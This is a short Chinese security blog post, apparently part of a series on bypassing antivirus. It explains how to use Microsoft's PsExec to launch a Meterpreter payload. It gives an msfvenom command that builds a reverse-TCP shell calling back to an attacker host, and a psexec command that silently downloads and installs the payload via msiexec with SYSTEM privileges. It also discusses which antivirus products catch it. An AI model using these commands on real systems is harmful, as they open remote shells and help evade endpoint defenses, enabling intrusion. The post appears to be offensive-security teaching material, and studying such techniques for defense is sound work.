声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

PsExec是SysinternalsSuite的小工具之一，是一种轻量级的telnet替代品，允许在其他系统上执行进程，完成控制台应用程序的完全交互，而无需手动安装客户端软件，并且可以获得与控制台应用程序相当的完全交互性。在windows系统并未默认安装，下载地址见参考文章。

生成木马：

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > /var/www/html/win_re.txt

psexec执行payload：

psexec.exe -s -d msiexec /q /i http://yourservice/shell/win_re.txt//-s 以system权限执行// -d 不产生交互式窗口

执行命令时360和火绒都会报警：

关闭杀毒软件，可正常建立会话：

vt免杀结果：

psexec下载地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

psexec官方文档：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec#using-psexec

psexec执行payload：https://micro8.github.io/Micro8-HTML/Chapter1/81-90/83_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95PsExec%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%B8%89%E5%AD%A3.html